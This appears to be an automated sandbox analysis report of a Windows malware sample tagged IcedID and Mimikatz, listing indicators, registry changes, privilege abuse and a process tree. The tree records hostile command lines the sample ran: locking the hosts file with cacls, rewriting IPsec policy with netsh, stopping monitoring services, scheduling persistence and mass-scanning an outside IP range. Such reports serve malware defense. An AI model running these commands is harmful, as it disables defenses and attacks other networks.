cmd.exenet.execmd.exenetsh.exenet1.exePING.EXEcmd.exenet.execacls.execmd.exe2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.execmd.exenet.exenet.exenet1.exesc.execmd.exenet1.execmd.exenetsh.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exenet1.exenet1.exenet1.execmd.exenetsh.execmd.execmd.exesc.exenet.exewlifiji.exenet.exenet.exenet1.execmd.exenetsh.execmd.execmd.execmd.exenetsh.exenetsh.exenetsh.execmd.exesc.execmd.exenetsh.exenetsh.exenet.exenet1.exeschtasks.execmd.exenet.exeschtasks.execmd.exenet.execmd.execmd.exexohudmc.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wlifiji.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 2092 cmd.exe 2060 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x0007000000023cb5-6.dat nsis_installer_2 behavioral2/files/0x0011000000023cc7-15.dat nsis_installer_1 behavioral2/files/0x0011000000023cc7-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
Processes:
bteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exewlifiji.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exedescription ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" wlifiji.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wlifiji.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" wlifiji.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" wlifiji.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wlifiji.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" wlifiji.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bteqliisl.exe Key created \REGISTRY\USER\.DEFAULT\Software bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bteqliisl.exe -
Modifies registry class 14 IoCs
Processes:
wlifiji.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ wlifiji.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" wlifiji.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" wlifiji.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 4808 schtasks.exe 3292 schtasks.exe 1644 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
wlifiji.exepid Process 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 656 656 656 656 656 656 656 656 656 656 656 656 656 656 656 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exepid Process 1492 2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exewlifiji.exewlifiji.exevfshost.exebteqliisl.exenfquyl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exebteqliisl.exedescription pid Process Token: SeDebugPrivilege 1492 2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3564 wlifiji.exe Token: SeDebugPrivilege 3616 wlifiji.exe Token: SeDebugPrivilege 4260 vfshost.exe Token: SeDebugPrivilege 2964 bteqliisl.exe Token: SeLockMemoryPrivilege 1684 nfquyl.exe Token: SeLockMemoryPrivilege 1684 nfquyl.exe Token: SeDebugPrivilege 4200 bteqliisl.exe Token: SeDebugPrivilege 2940 bteqliisl.exe Token: SeDebugPrivilege 3064 bteqliisl.exe Token: SeDebugPrivilege 5060 bteqliisl.exe Token: SeDebugPrivilege 2564 bteqliisl.exe Token: SeDebugPrivilege 740 bteqliisl.exe Token: SeDebugPrivilege 2068 bteqliisl.exe Token: SeDebugPrivilege 2452 bteqliisl.exe Token: SeDebugPrivilege 4536 bteqliisl.exe Token: SeDebugPrivilege 3748 bteqliisl.exe Token: SeDebugPrivilege 5064 bteqliisl.exe Token: SeDebugPrivilege 2940 bteqliisl.exe Token: SeDebugPrivilege 5000 bteqliisl.exe Token: SeDebugPrivilege 1276 bteqliisl.exe Token: SeDebugPrivilege 920 bteqliisl.exe Token: SeDebugPrivilege 604 bteqliisl.exe Token: SeDebugPrivilege 3404 bteqliisl.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exewlifiji.exewlifiji.exexohudmc.exeumueiy.exewlifiji.exewlifiji.exepid Process 1492 2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe 1492 2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe 3564 wlifiji.exe 3564 wlifiji.exe 3616 wlifiji.exe 3616 wlifiji.exe 3556 xohudmc.exe 1752 umueiy.exe 3280 wlifiji.exe 3280 wlifiji.exe 6032 wlifiji.exe 6032 wlifiji.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.execmd.exewlifiji.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 1492 wrote to memory of 2092 1492 2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe 84 PID 1492 wrote to memory of 2092 1492 2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe 84 PID 1492 wrote to memory of 2092 1492 2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe 84 PID 2092 wrote to memory of 2060 2092 cmd.exe 86 PID 2092 wrote to memory of 2060 2092 cmd.exe 86 PID 2092 wrote to memory of 2060 2092 cmd.exe 86 PID 2092 wrote to memory of 3564 2092 cmd.exe 92 PID 2092 wrote to memory of 3564 2092 cmd.exe 92 PID 2092 wrote to memory of 3564 2092 cmd.exe 92 PID 3616 wrote to memory of 5012 3616 wlifiji.exe 94 PID 3616 wrote to memory of 5012 3616 wlifiji.exe 94 PID 3616 wrote to memory of 5012 3616 wlifiji.exe 94 PID 5012 wrote to memory of 3008 5012 cmd.exe 96 PID 5012 wrote to memory of 3008 5012 cmd.exe 96 PID 5012 wrote to memory of 3008 5012 cmd.exe 96 PID 5012 wrote to memory of 3320 5012 cmd.exe 97 PID 5012 wrote to memory of 3320 5012 cmd.exe 97 PID 5012 wrote to memory of 3320 5012 cmd.exe 97 PID 5012 wrote to memory of 3336 5012 cmd.exe 98 PID 5012 wrote to memory of 3336 5012 cmd.exe 98 PID 5012 wrote to memory of 3336 5012 cmd.exe 98 PID 5012 wrote to memory of 2540 5012 cmd.exe 99 PID 5012 wrote to memory of 2540 5012 cmd.exe 99 PID 5012 wrote to memory of 2540 5012 cmd.exe 99 PID 5012 wrote to memory of 2888 5012 cmd.exe 100 PID 5012 wrote to memory of 2888 5012 cmd.exe 100 PID 5012 wrote to memory of 2888 5012 cmd.exe 100 PID 5012 wrote to memory of 4524 5012 cmd.exe 101 PID 5012 wrote to memory of 4524 5012 cmd.exe 101 PID 5012 wrote to memory of 4524 5012 cmd.exe 101 PID 3616 wrote to memory of 3096 3616 wlifiji.exe 110 PID 3616 wrote to memory of 3096 3616 wlifiji.exe 110 PID 3616 wrote to memory of 3096 3616 wlifiji.exe 110 PID 3616 wrote to memory of 1800 3616 wlifiji.exe 112 PID 3616 wrote to memory of 1800 3616 wlifiji.exe 112 PID 3616 wrote to memory of 1800 3616 wlifiji.exe 112 PID 3616 wrote to memory of 3612 3616 wlifiji.exe 114 PID 3616 wrote to memory of 3612 3616 wlifiji.exe 114 PID 3616 wrote to memory of 3612 3616 wlifiji.exe 114 PID 3616 wrote to memory of 3864 3616 wlifiji.exe 120 PID 3616 wrote to memory of 3864 3616 wlifiji.exe 120 PID 3616 wrote to memory of 3864 3616 wlifiji.exe 120 PID 3864 wrote to memory of 3400 3864 cmd.exe 122 PID 3864 wrote to memory of 3400 3864 cmd.exe 122 PID 3864 wrote to memory of 3400 3864 cmd.exe 122 PID 3400 wrote to memory of 3804 3400 wpcap.exe 123 PID 3400 wrote to memory of 3804 3400 wpcap.exe 123 PID 3400 wrote to memory of 3804 3400 wpcap.exe 123 PID 3804 wrote to memory of 4636 3804 net.exe 125 PID 3804 wrote to memory of 4636 3804 net.exe 125 PID 3804 wrote to memory of 4636 3804 net.exe 125 PID 3400 wrote to memory of 4808 3400 wpcap.exe 126 PID 3400 wrote to memory of 4808 3400 wpcap.exe 126 PID 3400 wrote to memory of 4808 3400 wpcap.exe 126 PID 4808 wrote to memory of 2724 4808 net.exe 128 PID 4808 wrote to memory of 2724 4808 net.exe 128 PID 4808 wrote to memory of 2724 4808 net.exe 128 PID 3400 wrote to memory of 4400 3400 wpcap.exe 129 PID 3400 wrote to memory of 4400 3400 wpcap.exe 129 PID 3400 wrote to memory of 4400 3400 wpcap.exe 129 PID 4400 wrote to memory of 5000 4400 net.exe 131 PID 4400 wrote to memory of 5000 4400 net.exe 131 PID 4400 wrote to memory of 5000 4400 net.exe 131 PID 3400 wrote to memory of 2888 3400 wpcap.exe 132
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2128
-
C:\Windows\TEMP\evfeutbbp\nfquyl.exe"C:\Windows\TEMP\evfeutbbp\nfquyl.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-24_89419f01e8cd90c37aad24df81044ebf_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\yqqdgivv\wlifiji.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2060
-
-
C:\Windows\yqqdgivv\wlifiji.exeC:\Windows\yqqdgivv\wlifiji.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3564
-
-
-
C:\Windows\yqqdgivv\wlifiji.exeC:\Windows\yqqdgivv\wlifiji.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3008
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:3320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3336
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:2540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2888
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:4524
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3096
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1800
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3612
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ysudwuiub\tluvwvuph\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Windows\ysudwuiub\tluvwvuph\wpcap.exeC:\Windows\ysudwuiub\tluvwvuph\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4636
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:2724
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:5000
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:2888 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:3592
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2904 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4832 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:876
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1628 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4612 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1952
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ysudwuiub\tluvwvuph\regnzlibv.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ysudwuiub\tluvwvuph\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:2684 -
C:\Windows\ysudwuiub\tluvwvuph\regnzlibv.exeC:\Windows\ysudwuiub\tluvwvuph\regnzlibv.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ysudwuiub\tluvwvuph\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5072
-
-
-
